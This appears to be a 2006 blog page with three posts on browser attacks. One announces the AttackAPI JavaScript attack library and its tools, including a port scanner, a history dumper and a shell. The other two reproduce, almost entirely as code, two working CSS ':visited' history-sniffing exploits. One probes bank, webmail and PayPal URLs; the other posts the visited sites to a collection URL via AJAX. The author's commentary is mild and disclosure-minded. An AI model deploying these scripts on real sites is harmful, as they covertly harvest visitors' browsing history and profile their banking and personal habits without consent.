Jesse Ezell Blog : Hack

Web = Minefield

Jesse Ezell — Thu, 07 Sep 2006 04:56:00 GMT

A simple way to compromise security of computers everywhere. How nice.

AttackAPI (0.6)

August 31st, 2006

AttackAPI provides simple and intuitive web programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies. The current release supports several browser based attacking techniques and simple but powerful JavaScript console.

The standalone components of the library can be found at the following locations:

http://www.gnucitizen.org/projects/attackapi/build/standalone/AttackAPI.js

http://www.gnucitizen.org/projects/attackapi/build/standalone/MasterAPI.js

Demonstration of the library capabilities is available here:

Index

Client

AuthorizationForcer

ExtensionScanner

HistoryDumper

NetworkSweeper

PortScanner

Utils

JavaScriptShell

The 0.7 release promises to integrate and introduce more tools and techniques.

[1] http://www.gnucitizen.org/projects/attackapi/

Stealing History (Part 2)

Jesse Ezell — Sat, 26 Aug 2006 19:32:00 GMT

Cody Swann has a modified version of the exploit using prototype that works in IE and has support for AJAX requests:

<html>
<head>
<script type="text/javascript" src="http://script.aculo.us/prototype.js"></script>
</head>
<body>
Have you been to these sites?
<script type="text/javascript">

Snoop = Class.create();

Snoop.prototype = {
	initialize: function(options)
	{
		this.options = Object.extend({
			writeStyle: true,
			linkObjArray: null, //AN ARRAY OF JSON FORMATTED LINK OBJ IN THE FORM OF {link:'http://...',text:'nameOfSite'} THAT WILL BE CHECKED
			identifier: '', //IF SAVING THE DATA, THIS IS WHAT YOU WOULD LIKE TO USE TO IDENFIFY THE SESSON
			saveURL: null, //URL TO SEND THE DATA TO
			method: 'get', //METHOD USED IN AJAX SAVE
			transport: null, //TRANSPORT USED TO SEND SAVED DATA (XMLHTTPRequest by default)
			onComplete: function(visitedLinks)///FUNCTION CALLED AFTER PARSING LINKS
			{
				var dummy = document.createElement('ul');
				visitedLinks.each(
					function(linkObj)
					{
						var text = document.createTextNode(linkObj.text);
						var node = document.createElement('a');
						var li = document.createElement('li');
						node.appendChild(text);
						node.setAttribute('href',linkObj.link);
						li.appendChild(node);
						dummy.appendChild(li);
					}
				);
				document.body.appendChild(dummy);
			},
			onSaveComplete: function(){},///CALLBACK FOR AJAX FUNCTION ON SUCCESS
			onSaveError: function(){}///CALLBACK FOR AJAX FUNCTION ON FAILURE
		}, options || {});
		this._visitedLinks = [];
		if(this.options.writeStyle)
		{
			document.write('<style type="text/css">a.testerLink:visited{display:block;height:1px;}</style>');
		}
		this.collectVisitedLinks();
		this.finish();
	},
	collectVisitedLinks: function()
	{
		var dummy = document.createElement('div');
		dummy.id = 'visitTestDiv';
		Element.setStyle(dummy,{visibility:'hidden',height:'1px',lineHeight:'1px'});
		document.body.appendChild(dummy);
		var linkObjs = this.options.linkObjArray || [{link:'http://new.com/',text:'new'},{link:'http://new.2com/',text:'new2'},{link:'http://google.com/',text:'Google.com'},{link:'http://espn.go.com/',text:'ESPN.com'},{link:'http://script.aculo.us/',text:'Scriptaculous'},{link:'http://digg.com/',text:'Digg'},{link:'http://blog.slimc.com/',text:'Slimc.com'},{link:'http://www.cnn.com/',text:'CNN.com'},{link:'http://www.yahoo.com/',text:'Yahoo!'},{link:'http://myspace.com',text:'MySpace'},{link:'http://www.ebay.com/',text:'ebay'},{link:'http://wikipedia.org/',text:'Wikipedia'},{link:'http://amazon.com/',text:'Amazon.com'},{link:'http://sfbay.craigslist.org/',text:"Craig's List"}];
		linkObjs.each(
			function(linkObj,count)
			{
				var text = document.createTextNode(linkObj.text);
				var node = document.createElement('a');

				node.setAttribute('href',linkObj.link);
				Element.addClassName(node,'testerLink');
				dummy.appendChild(node);
				if(parseInt(Element.getHeight(node)) != 0)
				{
					this._visitedLinks.push(linkObj);
				}
				Element.remove(node);
			}.bind(this)
		);
		Element.remove(dummy);
	},
	finish: function()
	{
		if(this.options.saveURL)
		{
			var urls = this._visitedLinks.collect(function(link){ return link.link; });
			urls = urls.join(',');
			urls = escape(urls.replace(/,$/,''));
			urls = urls.replace(/%2C/,',');
			new Ajax.Request(this.options.saveURL,{
				transport: this.options.transport,
				method: this.options.method,
				parameters: 'id=' + this.options.identifier + '&urls=' + urls,
				onSuccess: this.options.onSaveComplete,
				onFailure: this.options.onSaveError
			});
		}
		this.options.onComplete(this._visitedLinks);
	}
};
new Snoop({saveURL:'/right/here'});
</script>
</body>
</html>

[1] http://blog.slimc.com/prototype-javascript-ending-privacy-one-visit-at-a-time/

Stealing History

Jesse Ezell — Thu, 24 Aug 2006 23:15:00 GMT

Update: Cody Swan has a version that works in IE and supports AJAX to log the urls somewhere. Info here.

Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks. IE7 RC1 is smart enough to block the site, but FireFox lists my history without any complaints. Spooky. The script it embedded on the page, and it appears that basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Very clever way to hijack someone's history:

<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
	"http://login.yahoo.com/",
	"http://www.jailbabes.com",
	"http://ha.ckers.org",
	"http://seoblackhat.com",
	"http://www.cgisecurity.com",
	"http://www.spidynamics.com",
	"http://www.cenzic.com",
	"http://www.watchfire.com",
	"http://www.ntobjectives.com",
	"http://www.webappsec.org",
	"http://www.whitehatsec.com",
	"http://english.aljazeera.net/HomePage",
	"http://mail.google.com/",
	"http://mail.yahoo.com/",
	"http://my.yahoo.com/",
	"http://slashdot.org/",
	"http://www.myspace.com/",
	"http://www.amazon.com/",
	"http://www.aol.com/",
	"http://www.bankofamerica.com/",
	"http://www.bankone.com/",
	"http://www.blackhat.com/",
	"http://www.blogger.com/",
	"http://www.bofa.com/",
	"http://www.capitalone.com/",
	"http://www.chase.com/",
	"http://www.citibank.com/",
	"http://www.cnn.com/",
	"http://www.comerica.com/",
	"http://www.e-gold.com/",
	"http://www.ebay.com/",
	"http://www.etrade.com/",
	"http://www.google.com/",
	"http://www.hsbc.com/",
	"http://www.icq.com/",
	"http://www.microsoft.com/",
	"http://www.msn.com/",
	"http://www.myspace.com/",
	"http://www.passport.net/",
	"http://www.paypal.com/",
	"http://www.sourceforge.net/",
	"http://www.statefarm.com/",
	"http://www.usbank.com/",
	"http://www.wachovia.com/",
	"http://www.wamu.com/",
	"http://www.wellsfargo.com/",
	"http://www.xanga.com/",
	"http://www.yahoo.com/",
	"https://commerce.blackhat.com/",
	"https:/banking.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
	
	var d = document.createElement('div');
	d.id = 'xss_flag';
	document.body.appendChild(d);

	var d = document.createElement('table');
	d.border = 0;
	d.cellpadding = 5;
	d.cellspacing = 10;
	d.width = '90%';
	d.align = 'center';
	d.id = 'data';
	document.body.appendChild(d);
	
	document.write('<style>');
	for (var i = 0; i < websites.length; i++) {
		document.write('#id' + i + ":visited {color: #0000FF;}");
	}
	document.write('</style>');

	/* launch steal history */

if (is_mozilla) {
stealHistory();	
}
	
}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL.			#
-----------------------------------------------------------------------*/
function stealHistory() {
	
	// loop through websites and check which ones have been visited
	for (var i = 0; i < websites.length; i++) {
	
		var link = document.createElement("a");
		link.id = "id" + i;
		link.href = websites[i];
		link.innerHTML = websites[i];
		
		document.body.appendChild(link);
		var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
		document.body.removeChild(link);

		// check for visited
		if (color == "rgb(0, 0, 255)") {
			document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
		} // end visited check
		
	} // end visited website loop
	
} // end stealHistory method

</script>

[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html